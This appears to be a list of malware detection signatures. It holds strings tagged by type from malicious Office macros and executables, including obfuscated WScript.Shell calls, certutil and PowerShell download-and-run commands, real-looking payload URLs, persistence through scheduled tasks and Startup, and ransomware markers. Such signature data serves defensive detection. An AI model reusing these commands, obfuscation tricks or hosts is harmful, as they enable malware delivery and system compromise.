- "h"&"tt"&"ps://ha"&"mz"&"a"&"tra"&"de"&"rsbkr.com/29i"&"np"&"CqpjYK/l"&"ipa"&"ss.h"&"t"&"m"&"l (MACROHSTR_EXT)
- "h"&"tt"&"p"&"s://jud"&"ge"&"2w"&"in.com/g2A"&"jdl9"&"OK/lipas.h"&"t"&"m"&"l (MACROHSTR_EXT)
- "h"&"tt"&"ps://re"&"n"&"er"&"od"&"rigues.com.br/vOgdDJDBqdJy/lip.h"&"t"&"m"&"l (MACROHSTR_EXT)
- pZ6r6KEICIOhhurPfmehzz.pdb (PEHSTR_EXT)
- Category:GooglecomputerJP (PEHSTR_EXT)
- = ThisDocument.keywords (MACROHSTR_EXT)
- .SaveAs2 FileName:= (MACROHSTR_EXT)
- ThisDocument.s (MACROHSTR_EXT)
- = .BuiltInDocumentProperties("keywords").Value (MACROHSTR_EXT)
- ActiveDocument.Content.Find.Execute FindText:="_f", ReplaceWith:= (MACROHSTR_EXT)
- .exec "explo" & (MACROHSTR_EXT)
- = ThisDocument. (MACROHSTR_EXT)
- .SaveAs2 FileName (MACROHSTR_EXT)
- ActiveDocument.Content.Find.Execute FindText:="$1", ReplaceWith:= (MACROHSTR_EXT)
- .exec "c:\windows\explorer " & (MACROHSTR_EXT)
- main.karoline ("") (MACROHSTR_EXT)
- = StrReverse(ThisDocument.keywords) (MACROHSTR_EXT)
- ThisDocument.s StrReverse("llehs.tpircsw"), (MACROHSTR_EXT)
- ThisDocument.s StrReverse("lle" + (MACROHSTR_EXT)
- ).exec("explorer " & (MACROHSTR_EXT)
- keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value (MACROHSTR_EXT)
- ActiveDocument.Content.Find.Execute FindText:=" (MACROHSTR_EXT)
- DllInstall (PEHSTR_EXT)
- <Browser_JavascriptMessageReceived>b__22_0 (PEHSTR_EXT)
- KrnlUI.exe (PEHSTR_EXT)
- KrnlUI-main\KrnlUI\obj\Release\KrnlUI.pdb (PEHSTR_EXT)
- .CreateObject("Wsc" & "ript.Sh" + s1 + "ell", "").Run (MACROHSTR_EXT)
- service.CreateObject("Wscript.Shell", "").Run (MACROHSTR_EXT)
- CewcCewmCewd.CeweCewxCewe /Cewc sCewtCewaCewrt Cew/CewBCew CewpCewoCewwCewerCewsheCewlCewl (MACROHSTR_EXT)
- rs=\""h (MACROHSTR_EXT)
- + "ript.She" & "ll") (MACROHSTR_EXT)
- \Windows\ (MACROHSTR_EXT)
- System32\ (MACROHSTR_EXT)
- t"&"tp"&":// (MACROHSTR_EXT)
- System32\h (MACROHSTR_EXT)
- .exec (MACROHSTR_EXT)
- "c:\windows\explorer " & (MACROHSTR_EXT)
- .BuiltInDocumentProperties("keywords").Value) (MACROHSTR_EXT)
- Call ActiveDocument.Content.Find.Execute(FindText:="#a", ReplaceWith:="", Replace:=2) (MACROHSTR_EXT)
- service.CreateObject("Wscript.Shell", "").Run ra, 0 (MACROHSTR_EXT)
- ThisDocument.s "wscript.shell", (MACROHSTR_EXT)
- WinHost.exe (PEHSTR_EXT)
- AssemblyDescriptionAttribute (PEHSTR_EXT)
- \mm21.ocx (FILEPATH)
- \bleh.exe (FILEPATH)
- \mmups.exe (FILEPATH)
- \mediamotor25.exe (FILEPATH)
- \downloaded program files\mm21.inf (FILEPATH)
- \downloaded program files\mm21.ocx (FILEPATH)
- SOFTWARE\Classes\IObjSafety.DemoCtl (REGKEY)
- Software\Classes\IObjSafety.DemoCtl (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\\mediaswitch (REGKEY)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\media-motor (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{7149E79C-DC19-4C5E-A53C-A54DDF75EEE9} (REGKEY)
- SOFTWARE\Microsoft\Code Store Database\Distribution Units\{E0CE16CB-741C-4B24-8D04-A817856E07F4} (REGKEY)
- DisableScriptDebuggerIE (PEHSTR_EXT)
- beep.sys (PEHSTR_EXT)
- sbl.sys (PEHSTR_EXT)
- _.exe (PEHSTR_EXT)
- .com/file.exe (PEHSTR_EXT)
- svchost.exe (PEHSTR_EXT)
- Mozilla/4.0 (compatible) (PEHSTR_EXT)
- ShellExecuteExA (PEHSTR_EXT)
- wordpad.exe (PEHSTR_EXT)
- /c del (PEHSTR_EXT)
- ftp:// (PEHSTR_EXT)
- sc.exe start (PEHSTR_EXT)
- \WINDOWS\system32\regsvr32.exe (PEHSTR_EXT)
- 58.49.58.20 (PEHSTR_EXT)
- sc.exe description (PEHSTR_EXT)
- \WINDOWS\sc.exe (PEHSTR_EXT)
- -dbat" type= own type= interact start= auto DisplayName= (PEHSTR_EXT)
- sc.exe create (PEHSTR_EXT)
- ' target='_blank'>test</a> (PEHSTR_EXT)
- C:\bootfont.biz (PEHSTR_EXT)
- 192.168.0.102 (PEHSTR)
- 208.66.194.215 (PEHSTR)
- http://%s/Mail/%s (PEHSTR)
- &javascript:onSubmitToolbarItemClicked( (PEHSTR)
- 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb (PEHSTR)
- WScript.Echo(Encrypt( (PEHSTR)
- http://alfredo.myphotos.cc/scripts/view.asp (PEHSTR_EXT)
- ~DFBA17.tmp (PEHSTR_EXT)
- InstallerFileTakeOver.pdb (PEHSTR_EXT)
- NtCompareTokens (PEHSTR_EXT)
- ConvertStringSecurityDescriptorToSecurityDescriptorW (PEHSTR_EXT)
- @AppHelpToast.png (PEHSTR_EXT)
- C:\File\To\Take\Over (PEHSTR_EXT)
- pipe\ExploitPipe (PEHSTR_EXT)
- wob = CreateObject("wscript.shell") (MACROHSTR_EXT)
- & "\de" & "sk" & "to" & "p.ini" (MACROHSTR_EXT)
- ini = Replace(ini, "\", "\\") (MACROHSTR_EXT)
- CreateObject("WScript.Shell") (MACROHSTR_EXT)
- cscript (MACROHSTR_EXT)
- CreateObject("wscript.shell").Run """" & Way$ & """" (MACROHSTR_EXT)
- linka$ = "http://suknosepsa.temp.swtest.ru/RedCrab.exe" (MACROHSTR_EXT)
- Way$ = "C:\temp\RedCrab.exe" (MACROHSTR_EXT)
- .Open "GET", Replace(URL$, "\", "/"), "False" (MACROHSTR_EXT)
- Content.Find.Execute FindText:="3-", ReplaceWith:="", Replace:=2 (MACROHSTR_EXT)
- + ActiveDocument.BuiltInDocumentProperties("category").Value).exec "c:\windows\explorer " + (MACROHSTR_EXT)
- = "script" (MACROHSTR_EXT)
- ThisDocument.s Trim("w" + (MACROHSTR_EXT)
- + "."), (MACROHSTR_EXT)
- .CreateObject(hex2ascii(hex2ascii(ThisDocument.Words( (MACROHSTR_EXT)
- )))).Run "rundll32 C:\Users\Public\Documents\1. (MACROHSTR_EXT)
- Print #FileNum, hex2ascii(hex2ascii(ThisDocument.Words( (MACROHSTR_EXT)
- ))) + hex2ascii(hex2ascii(ThisDocument.Words( (MACROHSTR_EXT)
- Open "c:\programdata\vkwer.bat" (MACROHSTR_EXT)
- strMessage = " " & .Name & " , " & vbCr & _ (MACROHSTR_EXT)
- MsgBox Err.Description, vbCritical, " & " & Err.Number (MACROHSTR_EXT)
- PID = Shell("wscript apihandler.js", vbNormalFocus) (MACROHSTR_EXT)
- Range("GM2323").Value & Range("GM2324").Value & Range("GM2325").Value (MACROHSTR_EXT)
- Range("GM2325").Value = "" (MACROHSTR_EXT)
- ").value&range(" (MACROHSTR_EXT)
- ").valuefileout.writestrtextfileout.c (MACROHSTR_EXT)
- =shell("wscriptapihandler.js",vbnormalfocus)range(" (MACROHSTR_EXT)
- ").value=""range (MACROHSTR_EXT)
- = "cmd.exe /C (MACROHSTR_EXT)
- = "DownloadString('https://movetolight.xyz:443/disco (MACROHSTR_EXT)
- = CreateObject("Wscript.Shell (MACROHSTR_EXT)
- .Run ( (MACROHSTR_EXT)
- .Find.Execute(FindText:=" (MACROHSTR_EXT)
- GetObject("", "wscript.shell").exec text1(" (MACROHSTR_EXT)
- ActiveDocument.BuiltInDocumentProperties( (MACROHSTR_EXT)
- ).Value (MACROHSTR_EXT)
- Shell ("C:\\WinDOws\\SysTEM32\\CMD.exe /V/D/c ""seT sKk=script&&seT px=mshta (MACROHSTR_EXT)
- d='hHsvTtP:';GHsvetObjHsvect(c+d+'&&sET UF8=SKUZDSKUZDwweea8ae0f.usmarob.usSKUZD?2SKUZD');}catch(e){}close() (MACROHSTR_EXT)
- SKUZD=/%""<nul > %XMGK%.Hta|CMD /c !px! !XMGK!.HtA "" "), vbHidden (MACROHSTR_EXT)
- GetObject("", "wscript.shell").exec (MACROHSTR_EXT)
- .h" & ThisDocument. (MACROHSTR_EXT)
- &"e")&"\"&"l"&"ink"&"s\" (MACROHSTR_EXT)
- =activeworkbook.builtindocumentproperties.item(10/2) (MACROHSTR_EXT)
- +".p"+ (MACROHSTR_EXT)
- =createobject("scripting.filesystemobject") (MACROHSTR_EXT)
- .vb"+ (MACROHSTR_EXT)
- createobject((replace(module1. (MACROHSTR_EXT)
- ("llehs*tpircsw"),"*",".") (MACROHSTR_EXT)
- *nur*noisrevtnerruc*swodniw*tfosorcim*erawtfos*resu_tnerruc_yekh"),"*","\")),"rundll32.exepcwutl.dll,launchapplication" (MACROHSTR_EXT)
- &"e")&"\links\ (MACROHSTR_EXT)
- .vbs",(replace( (MACROHSTR_EXT)
- =environ$("appdata")&"\"& (MACROHSTR_EXT)
- setobjwshshell=createobject("wscript.shell")specialpath=objwshshell.specialfolders("templates") (MACROHSTR_EXT)
- =createobject("shell.application")=specialpath+("\mjhm.").open"get" (MACROHSTR_EXT)
- =.find.execute(findtext:="l0v",replacewith:="",replace:=2) (MACROHSTR_EXT)
- =.find.execute(findtext:="s3x",replacewith:="",replace:=2) (MACROHSTR_EXT)
- =activedocument.builtindocumentproperties( (MACROHSTR_EXT)
- ).value (MACROHSTR_EXT)
- )getobject("","wscript.shell").execcont1("category")+""+ (MACROHSTR_EXT)
- )createobject("wsc"+cont1("company")+"ell").execcont1("category")+""+ (MACROHSTR_EXT)
- .h"&thisdocument.cont1("comments"))activedocument.saveas2filename (MACROHSTR_EXT)
- fso.CreateTextFile("webzoon.js", True) (MACROHSTR_EXT)
- Shell("wscript webzoon.js", vbNormalFocus) (MACROHSTR_EXT)
- strText = UserForm1.TextBox1.Text (MACROHSTR_EXT)
- = Shell("cmd /c certutil.exe -urlcache -split -f ""http://doxiting.co.za/wp/wp-content/uploads/FULLFORCE.exe"" (MACROHSTR_EXT)
- && Pqdahiskothlvp.exe.exe", vbHide) (MACROHSTR_EXT)
- =vba.replace("mshki","ki","ta") (MACROHSTR_EXT)
- ="http://j.mp/"chu=fee+kki+aksdendfunctionpublicfunctionlnk() (MACROHSTR_EXT)
- publicfunctionta()vba.beepvba.beepcreateobject("wscript.shell").execchu+lnkendfunction (MACROHSTR_EXT)
- debug.printmsgbox("re-installoffice",vbokcancel);returns;1debug.printmeggggga.taendsub (MACROHSTR_EXT)
- CreateObject("Wscript.Shell").EXEC (MACROHSTR_EXT)
- = VBA.Replace("msh (MACROHSTR_EXT)
- = " http://j.mp/" (MACROHSTR_EXT)
- Debug.Print MsgBox("Re-Install Office", vbOKCancel); returns; 1 (MACROHSTR_EXT)
- Mirc\script.ini.locked (PEHSTR_EXT)
- joanna.smith@domain.com (PEHSTR_EXT)
- choice /t 1 /d y /n >nul (PEHSTR_EXT)
- .locked (PEHSTR_EXT)
- xxxx.onion/ (PEHSTR_EXT)
- .torrent (PEHSTR_EXT)
- .locky (PEHSTR_EXT)
- ConsoleApplication11.pdb (PEHSTR_EXT)
- A-Za-z.bat (MACROHSTR_EXT)
- dir c:\&echo (MACROHSTR_EXT)
- &start/B % (MACROHSTR_EXT)
- ("https://pastebin.com/raw/vmfavtlu"))adiag.savetofile"bfvby.vbs",2'savebinarydatatodiskcreateobject("wscript.shell").run"bfvby.vbs",0,falsesetadiag=nothingendsub (MACROHSTR_EXT)
- Debug.Print MsgBox("ERROR!", vbOKCancel); returns; 1 (MACROHSTR_EXT)
- obj.Uganda (MACROHSTR_EXT)
- Debug.Assert (Shell(salubhai)) (MACROHSTR_EXT)
- Uninstall\PDF_Reader (PEHSTR_EXT)
- CreateFileMappingA(i r5, i 0, i 0x40, i 0, i 0, i 0)i.r4 (PEHSTR_EXT)
- vbsedit.txt (PEHSTR_EXT)
- ExecToLog (PEHSTR_EXT)
- ShellExecuteExW (PEHSTR_EXT)
- http://henrysfreshroast.com/OevI7Yy0i6YShxFl/ (MACROHSTR_EXT)
- http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/ (MACROHSTR_EXT)
- http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/ (MACROHSTR_EXT)
- gandhitoday.org/video/6JvA8/ (MACROHSTR_EXT)
- djunreal.co.uk/site/ApOKpFad/ (MACROHSTR_EXT)
- johnsonsmedia.it/img/ZBNk0xpRL8YEVl (MACROHSTR_EXT)
- genccagdas.com.tr/assets/doWHIxLe7e (MACROHSTR_EXT)
- grafischer.ch/fit-well/wDPTwKtZPoWL12/ (MACROHSTR_EXT)
- ://mymicrogreen.mightcode.com/Fox-C/hlHV/ (MACROHSTR_EXT)
- ://188.166.]245.112/template/Ryk/ (MACROHSTR_EXT)
- ://47.]244.189.]73/--/er2yA5LkRcXrT0Q/ (MACROHSTR_EXT)
- ://www.dnautik.com/wp-includes/vTARHRKHjRqkGKU/ (MACROHSTR_EXT)
- ://al-brik.com/vb/EBB7FuaWnJm/ (MACROHSTR_EXT)
- ://bulldogironworksllc.com/temp/6UyNu8/ (MACROHSTR_EXT)
- ://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/ (MACROHSTR_EXT)
- ://filmmogzivota.rs/SpryAssets/gDR/ (MACROHSTR_EXT)
- ://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/ (MACROHSTR_EXT)
- ://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/ (MACROHSTR_EXT)
- ://cipro.mx/prensa/siZP69rBFmibDvuTP1L/ (MACROHSTR_EXT)
- ://colegiounamuno.es/cgi-bin/E/ (MACROHSTR_EXT)
- .exe.local (PEHSTR_EXT)
- \comctl32.dll (PEHSTR_EXT)
- convertstringsecuritydescriptortosecuritydescriptorw (PEHSTR_EXT)
- ntuser.dat (PEHSTR_EXT)
- WinHttpOpenRequest (PEHSTR_EXT)
- WinHttpReadData (PEHSTR_EXT)
- WinHttpAddRequestHeaders (PEHSTR_EXT)
- turbos.dll (PEHSTR_EXT)
- ShellExecuteW (PEHSTR_EXT)
- chr50chr48chr48dimwshshellasobjectdimspecialpathasstringsetwshshellcreateobjectwscriptshellspecialpath (MACROHSTR_EXT)
- $Script:ControlServers[$Script:ServerIndex] (PEHSTR_EXT)
- $script:AgentJitter (PEHSTR_EXT)
- .UploadData($ (PEHSTR_EXT)
- @.php (PEHSTR_EXT)
- [System.Net.ServicePointManager]::Expect100Continue=0; (PEHSTR_EXT)
- =New-Object System.Net.WebClient; (PEHSTR_EXT)
- .Headers.Add('User-Agent',$ (PEHSTR_EXT)
- .Headers.Add("Cookie"," (PEHSTR_EXT)
- .Proxy=[System.Net.WebRequest]::DefaultWebProxy; (PEHSTR_EXT)
- $Script:Proxy (PEHSTR_EXT)
- =[System.Text.Encoding]::ASCII.GetBytes(' (PEHSTR_EXT)
- .DownloadData($ser+$t); (PEHSTR_EXT)
- $t='/ (PEHSTR_EXT)
- 0.php'; (PEHSTR_EXT)
- .Headers.Add("User-Agent" (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- I?_7AbortChannel@dp_misc@@6BXTypeProvider@lang@star@sun@com@@@ (PEHSTR_EXT)
- IcheckBlacklist@DescriptionInfoset@dp_misc@@ABEXXZ (PEHSTR_EXT)
- C:\x5cProgramData\x5cddond.com\x20https://www.mediafire.com/file/ (MACROHSTR_EXT)
- .htm/file (MACROHSTR_EXT)
- Create ("wscript C:\Users\Public\update.js") (MACROHSTR_EXT)
- GetObject(hrWUX).Get(aSMXUWKZ).Create ("wscript C:\Users\Public\update.js") (MACROHSTR_EXT)
- GetObject(jiaksidj).Get(iajsdkasodk).Create ("wscript C:\Users\Public\killlll.js") (MACROHSTR_EXT)
- .htm/file' (MACROHSTR_EXT)
- ).create("wscriptc:\users\public\killlll.js") (MACROHSTR_EXT)
- ("https://pastebin.com/raw/rgulkfkl"))adiag.savetofile"bfvby.vbs",2'savebinarydatatodiskcreateobject("wscript.shell").run (MACROHSTR_EXT)
- ).Get( (MACROHSTR_EXT)
- ).Create ("wscript C:\Users\Public\ (MACROHSTR_EXT)
- .js") (MACROHSTR_EXT)
- kill("c:\users\"&environ("username")&"\documents\"&"tue.zip") (MACROHSTR_EXT)
- createobject("wscript.shell").specialfolders("mydocuments")&"\tue.zip"ret=urldownloadtofile(0,strurl,strpath,0,0 (MACROHSTR_EXT)
- "h"sae(1)="t"sae(2)="p"sae(3)="s"sae(4)=":"sae(5)="/" (MACROHSTR_EXT)
- shell("c:\users\"&environ("username")&"\documents"&"xl.png") (MACROHSTR_EXT)
- createobject("wscript.shell").specialfolders("mydocuments")&"\ttt.zip"ret=urldownloadtofile(0,strurl,strpath,0,0) (MACROHSTR_EXT)
- sae(0)="h"sae(1)="t"sae(2)="p"sae(3)="s"sae(4)=":"sae(5)="/" (MACROHSTR_EXT)
- wscriptc:\users\public\textfile.js"callshell(a,vbnormalfocus) (MACROHSTR_EXT)
- =worksheets("blanked").range("to1029")print#textfile,youtube (MACROHSTR_EXT)
- meta=worksheets("blanked1").range("a1030")+worksheets("blanked1").range("b103")p (MACROHSTR_EXT)
- gone="wscriptc:\users\public\pictures\focus.js"callvba.shell(one,vbnormalfocus)ends (MACROHSTR_EXT)
- Call MR.SetTimeouts(0, 2000, 2000, 5000) (MACROHSTR_EXT)
- MR.Open "GET", DecodeSTR(" (MACROHSTR_EXT)
- .setRequestHeader "Cache-Control", "no-cache" (MACROHSTR_EXT)
- .setRequestHeader "Pragma", "no-cache" (MACROHSTR_EXT)
- .send (MACROHSTR_EXT)
- .WaitForResponse (MACROHSTR_EXT)
- bbb = .ResponseText (MACROHSTR_EXT)
- Application.Quit (wdDoNotSaveChanges) (MACROHSTR_EXT)
- Set daraufh = headb.CreateTextFile("C:\ProgramData\graniteb.txt") (MACROHSTR_EXT)
- Set showsp = believesp.execquery("select * from antivirusproduct", "wql", 0) (MACROHSTR_EXT)
- daraufh.Write "function eBooksj($detectivef){$platformi = [Net.WebRequest]::Create('https://TheFinanceInvest.com/'+$detectivef);$platformi.Method='GET'; (MACROHSTR_EXT)
- impartiale = "C:\ProgramData\prncnfg.txt" (MACROHSTR_EXT)
- CreateObject("Shell.Application").ShellExecute "cscript.exe", "C:\windows\System32\Printing_Admin_Scripts\en-US\prnport.v" (MACROHSTR_EXT)
- Fluxus V7.exe (PEHSTR_EXT)
- Fluxus_IDE.Properties.Resources.resources (PEHSTR_EXT)
- \RobloxPlayerBeta.exe (PEHSTR_EXT)
- /C Inject.bat (PEHSTR_EXT)
- \bin\Discord.Fluxus (PEHSTR_EXT)
- DACInject.exe (PEHSTR_EXT)
- rbxscripts.xyz (PEHSTR_EXT)
- /FluxusTeamAPI.dll (PEHSTR_EXT)
- "c:\users\public\update.js" (MACROHSTR_EXT)
- worksheets("lol").range("l5")opensfileforoutputas#1print#1,youtube (MACROHSTR_EXT)
- wscript"+sfile:::::::::::debug.print (MACROHSTR_EXT)
- callvba.shell!(asss,vbnormalfocus) (MACROHSTR_EXT)
- = Replace("cmd. (MACROHSTR_EXT)
- ://ddl8.data.hu/ (MACROHSTR_EXT)
- .Save (MACROHSTR_EXT)
- = Replace("rundKfau8s8ad6yaKfau8s8ad6ya32 urKfau8s8ad6ya.dKfau8s8ad6yaKfau8s8ad6ya,OpenURL (MACROHSTR_EXT)
- = "C:\Users\Public\open.js" (MACROHSTR_EXT)
- = new ActiveXObject('Wscript.Shell');KALYJA = ""mshta (MACROHSTR_EXT)
- ://bitbucket.org/!api/2.0/snippets/rikimartinplace/9EEA9b/1a6205ffead27164296834f3bd103efdd0fe47f4/files/manavisionfinal (MACROHSTR_EXT)
- ://bitbucket.org/!api/2.0/snippets/rikimartinplace/KMMe6p/84dd89e3da0a597f178af84b75fa301869bb9740/files/charlesfinal (MACROHSTR_EXT)
- = "explorer.exe " (MACROHSTR_EXT)
- Call VBA.Shell%(textfile1) (MACROHSTR_EXT)
- int(89765*rnd)+198msee="scripting.":msee=msee&"fil (MACROHSTR_EXT)
- hro=6dimoutlings(speee)figg=0foreachscrrollinrange("h76:i92").rowsfigg=figg+3-speeewees=wees&mid (MACROHSTR_EXT)
- .Open "GET", "http://coremailxt5mainjsp.com/winlogon.exe" (MACROHSTR_EXT)
- .savetofile Environ("APPDATA") & "\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.pif", 2 (MACROHSTR_EXT)
- Environ("APPDATA") & "\Microsoft\Windows\Start Menu\Programs\Startup\test.exe" (MACROHSTR_EXT)
- = CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
- ("knl.2202_TNATROPMI/") (MACROHSTR_EXT)
- .IconLocation = "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico" (MACROHSTR_EXT)
- .Description = "Create peace and Enjoy" (MACROHSTR_EXT)
- ("tcejbOmetsySeliF.gnitpircS")) (MACROHSTR_EXT)
- = new ActiveXObject('Wscript.Shell');KALYJA = ""mshta (MACROHSTR_EXT)
- ://bitbucket.org/!api/2.0/snippets/rikimartinplace/6EEeM4/83bff5709919e38ef1c3bbcce9758c1ab61406b3/files/divinefinal (MACROHSTR_EXT)
- = "explorer.exe " + opentext (MACROHSTR_EXT)
- //www.asianexportglass.shop/p/ (MACROHSTR_EXT)
- .html (MACROHSTR_EXT)
- Call Shell^("wscript " + koaksodkasd) (MACROHSTR_EXT)
- ActiveXObject('Wscript.Shell');KALYJA = ""msht" (MACROHSTR_EXT)
- C:\Users\Public\zaim.js (MACROHSTR_EXT)
- ActiveXObject('Wscript.Shell'); (MACROHSTR_EXT)
- = "C:\Users\Public\ (MACROHSTR_EXT)
- .js (MACROHSTR_EXT)
- ("wscript " + (MACROHSTR_EXT)
- O=createobject("wscript.shell")specialpath=wshshell.specialfolders("recent") (MACROHSTR_EXT)
- range("t1").value=" (MACROHSTR_EXT)
- /"range("r1").value=" (MACROHSTR_EXT)
- /"msgbox"trryinfgvvtooptjbfdocumebjkbg" (MACROHSTR_EXT)
- .open"get", (MACROHSTR_EXT)
- createobject("wscript.shell")wshshell.runchr(34)&my_filename&chr(34) (MACROHSTR_EXT)
- auto_open()rows("3:42").hidden=falseconstmy_filename="c:\users\public\new.bat" (MACROHSTR_EXT)
- powershell-execbypass-nop-whidden-noni-enc"&chr(34) (MACROHSTR_EXT)
- You better choose somewhat random name here, as the possible script obfuscation (MACROHSTR_EXT)
- imgsrc = "https://filebin.net/qaxc46gx7mud9bal/imcool.txt" (MACROHSTR_EXT)
- "C:\Users\hatice.kuerten\Pictures\test.txt" (MACROHSTR_EXT)
- "C:\Users\hatice.kuerten\Pictures\test.bat" (MACROHSTR_EXT)
- setobjwmiservice=getobject("winmgmts:"_&"{impersonationlevel=impersonate}!\\"_&strcomputer&"\root\cimv2") (MACROHSTR_EXT)
- corrupt data, transcription errors, a copyright or other intellectual (MACROHSTR_EXT)
- =createobject("shell.application") (MACROHSTR_EXT)
- _=environ$("allusersprofile")&"\offiecs"&minute(now)&""&second(now)& (MACROHSTR_EXT)
- .copyfilesaddins,folder_adoes_name&"data.zip", (MACROHSTR_EXT)
- &file_adoes_name&".e"&replace("xe_pa","_pa","")shellfolder (MACROHSTR_EXT)
- ="http://inter"& (MACROHSTR_EXT)
- &orios&".com"oxhttp.open"get",kioer,false (MACROHSTR_EXT)
- "ndll"&oriospl="ru"&orios& (MACROHSTR_EXT)
- :withcreateobject("wscript.shell") (MACROHSTR_EXT)
- &environ$("userprofile")&"\documents"&_application.pathseparator& (MACROHSTR_EXT)
- specialpath+("\hv.").open"get",("h://www.d.m/gjkkhhhg/kjdh.") (MACROHSTR_EXT)
- specialpath+("\m.").open"get",("h://ghq.ghb./bh/") (MACROHSTR_EXT)
- chr(50)+chr(48)+chr(48)setwshshell=createobject("wscript.shell") (MACROHSTR_EXT)
- ''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/resgic/kt.gdceifv//:ptth'' (MACROHSTR_EXT)
- "powe" + "rs" + Range("F100").Value (MACROHSTR_EXT)
- shell("wscript"+myfile,vbnormalfocus)endsub (MACROHSTR_EXT)
- print#textfile,"ev"+"al(function(p,a,c,k,e,d){e=function(c){return(c<a"+userform1.tbxclave.tag+userform1 (MACROHSTR_EXT)
- range("a1:a13")icol=myrange.count (MACROHSTR_EXT)
- myfile="textfile.js" (MACROHSTR_EXT)
- shell"wscript"&y&"/a.vbs",vbnormalfocusendsub (MACROHSTR_EXT)
- b.open"get","https://dc438.4sync.com/download/od13hru0/done.jpg?dsid=wutvc4u7.7920b21f1 (MACROHSTR_EXT)
- auto_open()dimb:setb=createobject("microsoft.xmlhttp")dimc:setc=createobject("adodb.stream") (MACROHSTR_EXT)
- /favvv_crypted.exe""-outfile$tempfile;start-process$tempfile;setmypkkhxwnk=createobject("wscript.shell")setmypkkhxwnkexec=mypkkhxwnk.exec(fnsxmhz)endsu (MACROHSTR_EXT)
- powershell-windowstylehidden-executionpolicybypass;$tempfile=[io.path]::gettempfilename()|rename-item-newname{$_-replace'tmp$','exe' (MACROHSTR_EXT)
- wscript.exe /E:jscript (PEHSTR_EXT)
- chtasks.exe /F /create /sc minute /mo 4 /TN " (PEHSTR_EXT)
- /ST 04:00 /TR "wscript /nologo (PEHSTR_EXT)
- \\.\pipe\boost_process_auto_pipe (PEHSTR_EXT)
- =createobject("wscript.shell")shell.run"cmd/c"&savepath&">nul2>&1",0,trueendsub (MACROHSTR_EXT)
- url="https://lloydfedder.com/si2or.bat"'downloadthefile (MACROHSTR_EXT)
- xxxxxx_._load("http (MACROHSTR_EXT)
- d.txt")xxxxxx_._transformnodexxxxxxendsub (MACROHSTR_EXT)
- createobject("new:{2933bf90-7b36-11d2-b20e-00c04f983e60}"):::::::::xxxxxx_._async=false:: (MACROHSTR_EXT)
- :::::=vba.replace(,"~~","\\"):::::=vba.replace(,"!!",".js"):::::=vba.replace(,"$$","a")="@@~~users~~public~~sys.ini":::::=vba.replace(,"~~","\"):::::=vba.replace(,"@@","c:") (MACROHSTR_EXT)
- @@//b//e:~~c:&users&public&sys.ini" (MACROHSTR_EXT)
- :::::=vba.replace(,"&","\\"):::::=vba.replace(,"@@","wscript.exe"):::::=vba.replace(,"~~","jscript")debug.print:::::set=getobject("new:{72c24dd5-d70a-438b-8a42-98424b88afb8}")debug.print:::::::set=_.__exec!()debug.printendfunction (MACROHSTR_EXT)
- :=vba.replace(,"!!",".js"):::::=vba.replace(,"$$","a"):::::= (MACROHSTR_EXT)
- !![]);"debug.print:::closedebug.printopenforoutputas#1debug.printopenforoutputas#2debug.printprint#1,+1+2+3debug.printprint#2,+1+2+3close= (MACROHSTR_EXT)
- ):::::=vba.replace(,"~~","jscript")debug.printcallshell!()debug.printendsub (MACROHSTR_EXT)
- %USERPROFILE%\PowerModule.exe (PEHSTR_EXT)
- mshta vbscript:Execute (PEHSTR_EXT)
- \System Volume Information.lnk (PEHSTR_EXT)
- spread-ss.ru (PEHSTR_EXT)
- del /f /q (PEHSTR_EXT)
- \ntuser.ini (PEHSTR_EXT)
- registration></scriptlet> (PEHSTR_EXT)
- /i:../../../ (PEHSTR_EXT)
- </html> (PEHSTR_EXT)
- EE-912RebootReminder.script.ps1 (PEHSTR_EXT)
- Otcsei.Properties (PEHSTR_EXT)
- =createobject("wscript.shell")endfunction (MACROHSTR_EXT)
- allfault.execxyzt+l_o4+l_o5endfunction (MACROHSTR_EXT)
- l_o5="pass-nop-w1;i'e'x(iwr('http (MACROHSTR_EXT)
- createobject("wscript.shell")specialpath=wshshell.specialfolders("recent") (MACROHSTR_EXT)
- URLFile = "http://a0751007.xsph.ru/urEhL95r.exe" (MACROHSTR_EXT)
- CreateObject("wscript.shell").Run """" & Katalog & "\" & NameFileIn & """" (MACROHSTR_EXT)
- = eliminano("9 H/11cV T3 5s8taOr6t ", 1) (MACROHSTR_EXT)
- & eliminano("8\AcN4BaJ8l0c532.8eYxE7e1", 3) (MACROHSTR_EXT)
- (CreateObject("wscript.shell").exec(Exel).StdOut.ReadAll()): Workbooks.Application.DisplayAlerts = False: Application.Quit (MACROHSTR_EXT)
- CreateObject("Wscript.shell").Run (MACROHSTR_EXT)
- Set a = fs.CreateTextFile("C:\Users\" & Application.UserName & "\Documents\inv.vbs", True) (MACROHSTR_EXT)
- a.WriteLine ("CreateObject(" & Chr(34) & "Wscript.Shell" & Chr(34) & ").Run " & Chr(34) & Chr(34) & Chr(34) & Chr(34) & " & WScript.Arguments(0) & " & Chr(34) & Chr(34) & Chr(34) & Chr(34) & ", 0, False") (MACROHSTR_EXT)
- b.WriteLine ("cd C:\Sys32 && powershell -command " & Chr(34) & "Invoke-WebRequest -Uri 'https://cdn-131.anonfiles.com/jbN3p9Tfy4/0ba752fe-1674397444/HULD6ahu59QR4PHB.zip' -OutFile untitled.zip" & Chr(34)) (MACROHSTR_EXT)
- b.WriteLine ("powershell -command " & Chr(34) & "expand-archive -path 'untitled.zip'") (MACROHSTR_EXT)
- b.WriteLine ("wscript " & Chr(34) & "C:\Sys32\inv.vbs" & Chr(34) & " C:\Sys32\untitled\Untitled.bat") (MACROHSTR_EXT)
- httphttps:// (MACROHSTR_EXT)
